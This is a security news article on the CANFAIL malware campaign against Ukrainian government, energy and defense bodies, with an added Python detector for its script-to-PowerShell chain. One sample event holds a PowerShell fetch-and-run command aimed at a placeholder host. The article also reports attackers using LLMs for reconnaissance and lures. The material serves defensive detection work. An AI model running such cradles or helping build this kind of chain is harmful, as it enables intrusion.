Attacks using the CANFAIL malware have been linked to a hitherto unknown threat actor. The hacker group may have been connected to Russian intelligence services, according to the Google Threat Intelligence Group (GTIG). According to the assessment, the threat actor has targeted government, military, defense, and energy institutions within the regional and national governments of Ukraine.
But the group has also shown increasing interest in aerospace groups, manufacturing firms with drone and military connections, nuclear and chemical research groups, and international groups that monitor the conflict and provide humanitarian aid in Ukraine, GTIG said. According to GTIG, "this actor recently started to overcome some technical limitations using LLMs [large language models], despite being less sophisticated and resourced than other Russian threat groups."
"They perform reconnaissance, make social engineering lures, and look for answers to fundamental technical questions for post-compromise activity and C2 infrastructure setup through prompting." The threat actor has been posing as reputable national and local Ukrainian energy organizations in recent phishing campaigns in order to gain unauthorized access to personal and organizational email accounts. Along with targeting a Romanian company and conducting reconnaissance on Moldovan organizations, the group is also accused of posing as a Romanian energy company that serves clients in Ukraine.
Based on their research, the threat actor creates email address lists specific to particular industries and regions in order to facilitate its operations. The attack chains embed links to a RAR file containing the CANFAIL malware and appear to use lures created by an LLM.
CANFAIL is an obfuscated JavaScript malware that is typically disguised with a double extension to pass itself off as a PDF document (*.pdf.js). Its purpose is to run a PowerShell script, which then downloads and runs a memory-only PowerShell dropper. At the same time, it shows the victim a phony "error" message.
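The double-extension file and the JavaScript-to-PowerShell chain described above leave a recognizable trail in endpoint process-creation telemetry. The following is an added example, not code from GTIG or the article: a small Python detector run over constructed process-creation events (the paths, PIDs and URL are made up), flagging a script host opening a "*.pdf.js" file and PowerShell spawned by that script host with a download cradle.

```python
import re

# Constructed sample of endpoint process-creation events (not real telemetry):
# a CANFAIL-style chain where a double-extension "*.pdf.js" file is run by the
# Windows Script Host and then spawns PowerShell with a download cradle.
SAMPLE_EVENTS = [
    {"pid": 4100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\a\Downloads\invoice.pdf.js"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/s')",
     "parent_image": r"C:\Windows\System32\wscript.exe"},
    {"pid": 4200, "image": r"C:\Program Files\Adobe\Acrobat.exe",   # benign PDF open
     "cmdline": r'Acrobat.exe "C:\Users\a\Downloads\report.pdf"',
     "parent_image": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# A document extension immediately followed by a script extension (e.g. .pdf.js)
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|xls|xlsx)\.(js|jse|vbs|wsf|hta)\b", re.IGNORECASE)
# Common PowerShell download / in-memory execution cradle keywords
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string)",
    re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (pid, reason) findings for CANFAIL-like activity in the event list."""
    findings = []
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev.get("parent_image", ""))
        cmd = ev["cmdline"]
        # Rule 1: a script host executing a file that hides a script behind a document extension
        if image in SCRIPT_HOSTS and DOUBLE_EXT.search(cmd):
            findings.append((ev["pid"], "script host ran double-extension file"))
        # Rule 2: PowerShell spawned by a script host with a download / in-memory cradle
        if image == "powershell.exe" and parent in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(cmd):
            findings.append((ev["pid"], "powershell download cradle spawned by script host"))
    return findings

if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

Either rule alone is noisy in some environments; correlating both within the same process tree, as the sample does, is what makes the finding specific to this chain.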
According to Google, the threat actor is also connected to the PhantomCaptcha campaign, which was revealed by SentinelOne SentinelLABS in October 2025 and targets organizations involved in Ukraine's war relief efforts. The campaign uses phishing emails that send recipients to phony websites that contain ClickFix-style instructions that activate the infection sequence and spread a trojan that is based on WebSockets.